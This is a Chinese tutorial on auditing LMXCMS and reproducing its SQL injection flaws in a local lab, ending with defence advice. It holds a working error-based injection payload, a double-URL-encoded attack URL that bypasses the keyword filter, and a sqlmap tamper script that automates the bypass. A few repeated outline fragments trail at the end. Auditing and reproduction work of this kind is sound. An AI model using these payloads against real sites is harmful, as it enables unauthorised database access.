LMXCMS 源代码审计与漏洞复现教学文档<\/h1>

一、环境搭建<\/h2>

1. 源码下载<\/h3>

下载地址：http:\/\/www.lmxcms.com\/down\/<\/li>

建议下载最新版本进行测试<\/li> <\/ul>

2. 开发环境配置<\/h3>

PHPStorm + Xdebug 调试环境<\/li>
PHP 版本建议 5.x（与 LMXCMS 兼容）<\/li>

MySQL 数据库<\/li> <\/ul>

3. 安装步骤<\/h3>

将源码解压至 web 目录<\/li>
访问 \/install<\/code> 目录进行安装<\/li>
按照安装向导完成数据库配置<\/li>

安装成功后访问首页验证<\/li>
<\/ol>
二、漏洞分析<\/h2>
1. 前台 TagsAction.class.php SQL 注入漏洞<\/h3>
漏洞位置<\/h4>
TagsAction.class.php<\/code> 文件中的 __construct<\/code> 方法<\/p>
漏洞原理<\/h4>

通过 p(2,1,1)<\/code> 获取 GET 参数<\/li>
参数经过 string::delHtml<\/code> 和 urldecode<\/code> 处理<\/li>
直接拼接 SQL 语句导致注入<\/li>
<\/ol>
关键代码分析<\/h4>
class<\/span> TagsAction<\/span> extends<\/span> HomeAction<\/span>{
<\/span><\/span>    private<\/span> $data;
<\/span><\/span>    private<\/span> $tagsModel =<\/span> null<\/span>;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        parent<\/span>::<\/span>__construct<\/span>();
<\/span><\/span>        $data =<\/span> p<\/span>(2<\/span>,1<\/span>,1<\/span>); \/\/ 获取GET参数
<\/span><\/span><\/span><\/span>        $name =<\/span> string<\/span>::<\/span>delHtml<\/span>($data['name'<\/span>]);
<\/span><\/span>        if<\/span>(!<\/span>$name) _404<\/span>();
<\/span><\/span>        $name =<\/span> urldecode<\/span>($name); \/\/ 第一次URL解码
<\/span><\/span><\/span><\/span>        
<\/span><\/span>        if<\/span>($this-><\/span>tagsModel<\/span> ==<\/span> null<\/span>) $this-><\/span>tagsModel<\/span> =<\/span> new<\/span> TagsModel<\/span>();
<\/span><\/span>        $this-><\/span>data<\/span> =<\/span> $this-><\/span>tagsModel<\/span>-><\/span>getNameData<\/span>($name); \/\/ 直接使用name参数查询
<\/span><\/span><\/span><\/span>        if<\/span>(!<\/span>$this-><\/span>data<\/span>) _404<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤函数分析<\/h4>
function<\/span> p<\/span>($type=<\/span>1<\/span>,$pe=<\/span>false<\/span>,$sql=<\/span>false<\/span>,$mysql=<\/span>false<\/span>){
<\/span><\/span>    if<\/span>($type ==<\/span> 1<\/span>){
<\/span><\/span>        $data =<\/span> $_POST;
<\/span><\/span>    }else<\/span> if<\/span>($type ==<\/span> 2<\/span>){
<\/span><\/span>        $data =<\/span> $_GET;
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        $data =<\/span> $type;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    if<\/span>($sql) filter_sql<\/span>($data); \/\/ 调用SQL过滤
<\/span><\/span><\/span><\/span>    if<\/span>($mysql) mysql_retain<\/span>($data);
<\/span><\/span>    
<\/span><\/span>    foreach<\/span>($data as<\/span> $k =><\/span> $v){
<\/span><\/span>        if<\/span>(is_array<\/span>($v)){
<\/span><\/span>            $newdata[$k] =<\/span> p<\/span>($v,$pe,$sql,$mysql);
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            if<\/span>($pe){
<\/span><\/span>                $newdata[$k] =<\/span> string<\/span>::<\/span>addslashes<\/span>($v);
<\/span><\/span>            }else<\/span>{
<\/span><\/span>                $newdata[$k] =<\/span> trim<\/span>($v);
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $newdata;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ SQL过滤函数
<\/span><\/span><\/span><\/span>function<\/span> filter_sql<\/span>(array<\/span> $data){
<\/span><\/span>    foreach<\/span>($data as<\/span> $v){
<\/span><\/span>        if<\/span>(is_array<\/span>($v)){
<\/span><\/span>            filter_sql<\/span>($v);
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            $v =<\/span> strtolower<\/span>($v); \/\/ 转换为小写
<\/span><\/span><\/span><\/span>            if<\/span>(preg_match<\/span>('\/count|create|delete|select|update|use|drop|insert|info|from\/'<\/span>,$v)){
<\/span><\/span>                rewrite<\/span>::<\/span>js_back<\/span>('【'<\/span>.<\/span>$v.<\/span>'】数据非法'<\/span>);
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用方式<\/h4>

由于 urldecode<\/code> 在 filter_sql<\/code> 之后执行，可以进行二次URL编码绕过<\/li>
构造Payload：1' and updatexml(0,concat(0x7e,user()),1)#<\/code><\/li>
进行两次URL编码后传入<\/li>
<\/ol>
漏洞复现步骤<\/h4>

访问URL：http:\/\/127.0.0.1\/lmxcms1.4\/index.php?m=Tags&name=%25%33%31%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33<\/code><\/li>
解码过程：

第一次解码：%31%27%20%61%6e%64%20%75%70%64%61%74%65%78%6d%6c%28%30%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%75%73%65%72%28%29%29%2c%31%29%23<\/code><\/li>
第二次解码：1' and updatexml(0,concat(0x7e,user()),1)#<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
SQLMap Tamper 脚本<\/h4>
# sqlmap\/tamper\/urlencode.py<\/span>
<\/span><\/span>import<\/span> urllib.parse
<\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY
<\/span><\/span>
<\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>LOWEST
<\/span><\/span>
<\/span><\/span>def<\/span> dependencies<\/span>():
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs):
<\/span><\/span>    """
<\/span><\/span><\/span>    对payload进行URL编码的tamper函数。
<\/span><\/span><\/span>    :param payload: 需要编码的原始payload字符串
<\/span><\/span><\/span>    :param kwargs: 额外的关键字参数
<\/span><\/span><\/span>    :return: URL编码后的payload字符串
<\/span><\/span><\/span>    """<\/span>
<\/span><\/span>    if<\/span> isinstance(payload, str):
<\/span><\/span>        encoded_payload =<\/span> urllib.<\/span>parse.<\/span>quote(payload)
<\/span><\/span>        enencoded_payload =<\/span> urllib.<\/span>parse.<\/span>quote(encoded_payload)
<\/span><\/span>        return<\/span> enencoded_payload
<\/span><\/span>    return<\/span> payload
<\/span><\/span><\/code><\/pre>2. 前台 SearchAction.class.php SQL 注入漏洞<\/h3>
漏洞位置<\/h4>
搜索功能相关代码<\/p>
漏洞原理<\/h4>

搜索功能未对用户输入进行充分过滤<\/li>
直接拼接SQL语句导致注入<\/li>
<\/ol>
漏洞复现<\/h4>

在首页搜索框中输入测试Payload<\/li>
观察URL参数变化<\/li>
构造恶意输入进行测试<\/li>
<\/ol>
三、调试技巧<\/h2>
使用 Xdebug + PHPStorm 调试<\/h3>

配置 Xdebug 扩展<\/li>
PHPStorm 设置调试配置<\/li>
在关键函数处设置断点<\/li>
使用 XDEBUG_SESSION_START<\/code> 参数触发调试<\/li>
<\/ol>
示例调试URL：

http:\/\/127.0.0.1\/lmxcms1.4\/index.php?m=Tags&name=test?XDEBUG_SESSION_START=16408<\/code><\/p>
四、防御建议<\/h2>

对所有用户输入进行严格的过滤和验证<\/li>
使用参数化查询或预处理语句<\/li>
避免直接拼接SQL语句<\/li>
对关键函数进行安全审计<\/li>
更新到最新版本，修复已知漏洞<\/li>
<\/ol>
五、总结<\/h2>
本文详细分析了 LMXCMS 中的两个SQL注入漏洞，重点介绍了：<\/p>

TagsAction.class.php 中的注入漏洞原理和利用方式<\/li>
二次URL编码绕过过滤的技巧<\/li>
使用SQLMap Tamper脚本自动化测试<\/li>
Xdebug调试方法<\/li>
防御建议<\/li>
<\/ol>
通过本教程，读者可以掌握基本的代码审计方法和漏洞利用技巧，提高Web应用安全防护能力。<\/p>

LMXCMS 源代码审计与漏洞复现教学文档<\/h1>

一、环境搭建<\/h2>

二、漏洞分析<\/h2>

1. 前台 TagsAction.class.php SQL 注入漏洞<\/h3>

漏洞位置<\/h4> TagsAction.class.php<\/code> 文件中的 __construct<\/code> 方法<\/p>

2. 前台 SearchAction.class.php SQL 注入漏洞<\/h3>

漏洞位置<\/h4> 搜索功能相关代码<\/p>

三、调试技巧<\/h2>

漏洞位置<\/h4>
`TagsAction.class.php<\/code> 文件中的 __construct<\/code> 方法<\/p>`

漏洞位置<\/h4>
搜索功能相关代码<\/p>